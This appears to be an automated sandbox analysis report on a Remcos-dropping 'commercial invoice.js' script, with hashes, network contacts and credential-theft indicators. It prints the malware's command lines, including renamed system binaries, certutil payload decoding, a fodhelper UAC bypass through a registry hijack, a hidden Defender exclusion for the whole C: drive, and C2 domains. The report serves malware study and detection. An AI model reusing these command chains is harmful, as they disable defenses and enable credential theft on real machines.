Analysis Overview
SHA256
dc9834a7967c856395ccc15358635e9cb6fc59e7f2dc2f9f58a9f2e26b717ed5
Threat Level: Known bad
The file commercial invoice.js was found to be: Known bad.
Malicious Activity Summary
Remcos
NirSoft WebBrowserPassView
NirSoft MailPassView
Detected Nirsoft tools
Blocklisted process makes network request
Reads user/profile data of web browsers
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Kills process with taskkill
Modifies registry class
Script User-Agent
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-18 23:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-18 23:13
Reported
2024-07-18 23:16
Platform
win7-20240705-en
Max time kernel
145s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
C:\Users\Public\Libraries\CLEAN.COM
C:\Users\Public\Libraries\CLEAN.COM
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | madibarohillafour.duckdns.org | udp |
| US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp |
| US | 8.8.8.8:53 | madibarohillafour.duckdns.org | udp |
| US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp |
| US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat
| MD5 | e738497b75feb03a11e7b7e763f51037 |
| SHA1 | 08c5205a67595a5c9e29341d03b6b66da96528e1 |
| SHA256 | 897173be3c5e872e2d8560f8df743f93c8eb857f8d2d22d3196343c35e90abac |
| SHA512 | 3f1812c950e37b3048209e2abdecdfd40650541eefe9722f35771e7fc5723f409dbcffff7325421418948666c312165fa3f182ab3eb5fa442bbee46cb43118bc |
C:\Users\Public\alpha.exe
| MD5 | 5746bd7e255dd6a8afa06f7c42c1ba41 |
| SHA1 | 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 |
| SHA256 | db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386 |
| SHA512 | 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e |
\Users\Public\kn.exe
| MD5 | ec1fd3050dbc40ec7e87ab99c7ca0b03 |
| SHA1 | ae7fdfc29f4ef31e38ebf381e61b503038b5cb35 |
| SHA256 | 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3 |
| SHA512 | 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2 |
C:\Users\Public\CLEAN.GIF
| MD5 | 7b55805a9a2ffab38db59819b5c5c274 |
| SHA1 | 65996c765dfc6a7665c8835edbf1bc4e7a1c9502 |
| SHA256 | 50a94c852a9b0ba9f6ca217dfa79652b48a2ac41fe2b4578faad2e8e4a95800a |
| SHA512 | 3ac6a88d062cb076feb0b3397d12c61b8575763c9bb245d92b2d0b44b10451948a1d284244870c23e4e104575f3ccd09e0e0c7ee43e888a13f384ef1444fa2fb |
C:\Users\Public\Libraries\CLEAN.COM
| MD5 | beacddde34cecf28562a676b781d71e4 |
| SHA1 | 58ee38081e67d99f494248d682ce907921b1e020 |
| SHA256 | 80091724af78d5cfdcb8a3a57eaf479f2a49b3479d69e4043a4bef74d0f5ae0b |
| SHA512 | 75df3ece32221eea5ec75ec5ff58d9484f6d317c2a55a04fb811a4f25409fd1761077df8e920dd683b9f3d37233f6d1e21e3e06e2a47a6539625d23ae05c83b1 |
memory/768-39-0x0000000000400000-0x00000000004F8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-18 23:13
Reported
2024-07-18 23:16
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
145s
Command Line
Signatures
Remcos
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Users\Public\Libraries\nasppvoG.pif | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation | C:\Windows \System32\per.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Public\Libraries\CLEAN.COM | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Govppsan = "C:\\Users\\Public\\Govppsan.url" | C:\Users\Public\Libraries\CLEAN.COM | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1328 set thread context of 3556 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\nasppvoG.pif |
| PID 1328 set thread context of 2340 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\CLEAN.COM |
| PID 1328 set thread context of 4616 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\CLEAN.COM |
| PID 1328 set thread context of 1476 | N/A | C:\Users\Public\Libraries\CLEAN.COM | C:\Users\Public\Libraries\CLEAN.COM |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\ms-settings | C:\Users\Public\ger.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
| N/A | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\Libraries\CLEAN.COM | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\commercial invoice.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat" "C:\\Users\\Public\\CLEAN.GIF" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
C:\Users\Public\Libraries\CLEAN.COM
C:\Users\Public\Libraries\CLEAN.COM
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
C:\Users\Public\Libraries\nasppvoG.pif
C:\Users\Public\Libraries\nasppvoG.pif
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1D28.tmp\1D29.tmp\1D2A.bat C:\Users\Public\Libraries\nasppvoG.pif"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 2
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\CLEAN.COM C:\\Users\\Public\\Libraries\\Govppsan.PIF
C:\Users\Public\Libraries\CLEAN.COM
C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\rrzifaienneuhgtllgiwfpebmdzeowfu"
C:\Users\Public\Libraries\CLEAN.COM
C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\btesg"
C:\Users\Public\Libraries\CLEAN.COM
C:\Users\Public\Libraries\CLEAN.COM /stext "C:\Users\Admin\AppData\Local\Temp\mnrlhdez"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | madibarohillafour.duckdns.org | udp |
| US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.130.101.191.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp |
| US | 191.101.130.5:80 | madibarohillafour.duckdns.org | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | myfrontmannysix.ddns.net | udp |
| CA | 199.189.26.138:4939 | myfrontmannysix.ddns.net | tcp |
| US | 8.8.8.8:53 | 138.26.189.199.in-addr.arpa | udp |
| CA | 199.189.26.138:4939 | myfrontmannysix.ddns.net | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat
| MD5 | e738497b75feb03a11e7b7e763f51037 |
| SHA1 | 08c5205a67595a5c9e29341d03b6b66da96528e1 |
| SHA256 | 897173be3c5e872e2d8560f8df743f93c8eb857f8d2d22d3196343c35e90abac |
| SHA512 | 3f1812c950e37b3048209e2abdecdfd40650541eefe9722f35771e7fc5723f409dbcffff7325421418948666c312165fa3f182ab3eb5fa442bbee46cb43118bc |
C:\Users\Public\alpha.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Users\Public\kn.exe
| MD5 | bd8d9943a9b1def98eb83e0fa48796c2 |
| SHA1 | 70e89852f023ab7cde0173eda1208dbb580f1e4f |
| SHA256 | 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2 |
| SHA512 | 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b |
C:\Users\Public\CLEAN.GIF
| MD5 | 7b55805a9a2ffab38db59819b5c5c274 |
| SHA1 | 65996c765dfc6a7665c8835edbf1bc4e7a1c9502 |
| SHA256 | 50a94c852a9b0ba9f6ca217dfa79652b48a2ac41fe2b4578faad2e8e4a95800a |
| SHA512 | 3ac6a88d062cb076feb0b3397d12c61b8575763c9bb245d92b2d0b44b10451948a1d284244870c23e4e104575f3ccd09e0e0c7ee43e888a13f384ef1444fa2fb |
C:\Users\Public\Libraries\CLEAN.COM
| MD5 | beacddde34cecf28562a676b781d71e4 |
| SHA1 | 58ee38081e67d99f494248d682ce907921b1e020 |
| SHA256 | 80091724af78d5cfdcb8a3a57eaf479f2a49b3479d69e4043a4bef74d0f5ae0b |
| SHA512 | 75df3ece32221eea5ec75ec5ff58d9484f6d317c2a55a04fb811a4f25409fd1761077df8e920dd683b9f3d37233f6d1e21e3e06e2a47a6539625d23ae05c83b1 |
memory/1328-33-0x0000000000400000-0x00000000004F8000-memory.dmp
C:\Users\Public\Libraries\nasppvoG.pif
| MD5 | c116d3604ceafe7057d77ff27552c215 |
| SHA1 | 452b14432fb5758b46f2897aeccd89f7c82a727d |
| SHA256 | 7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301 |
| SHA512 | 9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6 |
memory/3556-40-0x0000000000400000-0x0000000001400000-memory.dmp
memory/3556-42-0x0000000000400000-0x000000000041A000-memory.dmp
memory/3556-37-0x0000000000400000-0x0000000001400000-memory.dmp
memory/3556-43-0x0000000000400000-0x0000000001400000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1D28.tmp\1D29.tmp\1D2A.bat
| MD5 | e62f427202d3e5a3ba60ebe78567918c |
| SHA1 | 6ef0cd5ba6c871815fceb27ff095a7931452b334 |
| SHA256 | 06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff |
| SHA512 | e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6 |
C:\Users\Public\xkn.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_toejrzv5.eja.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1476-75-0x000001ECFE9F0000-0x000001ECFEA12000-memory.dmp
C:\Windows \System32\per.exe
| MD5 | 85018be1fd913656bc9ff541f017eacd |
| SHA1 | 26d7407931b713e0f0fa8b872feecdb3cf49065a |
| SHA256 | c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5 |
| SHA512 | 3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459 |
memory/3556-100-0x0000000000400000-0x000000000041A000-memory.dmp
memory/3556-98-0x0000000000400000-0x0000000001400000-memory.dmp
memory/1328-106-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
memory/1328-107-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
memory/1328-109-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
memory/1328-108-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
memory/1328-110-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
memory/1328-111-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
memory/1328-113-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
memory/2340-121-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1476-132-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1476-133-0x0000000000430000-0x00000000004F9000-memory.dmp
memory/1476-135-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4616-131-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1476-130-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2340-129-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1476-123-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2340-119-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4616-120-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1476-128-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4616-117-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2340-115-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4616-122-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2340-138-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rrzifaienneuhgtllgiwfpebmdzeowfu
| MD5 | 463b5cfc270ed672e140fc2c1a25aec1 |
| SHA1 | 23e37a49996b1208888e054fab11aa1e1a81f649 |
| SHA256 | 2bd023dd922e93f6c6f471751ae97a1fd24a93aa4230e53ac91b8c37dab9b185 |
| SHA512 | b0fa0425dc462fa10a56fb28f36b84f3a0e6426922c1fd37e56c4406e713a00aef2bbc04024f06133d1f63960a97372feb32fd4ebf43105b9d9823f37820b4b6 |
memory/1328-141-0x00000000519A0000-0x00000000519B9000-memory.dmp
memory/1328-145-0x00000000519A0000-0x00000000519B9000-memory.dmp
memory/1328-144-0x00000000519A0000-0x00000000519B9000-memory.dmp
memory/1328-146-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
memory/1328-150-0x0000000033AF0000-0x0000000034AF0000-memory.dmp
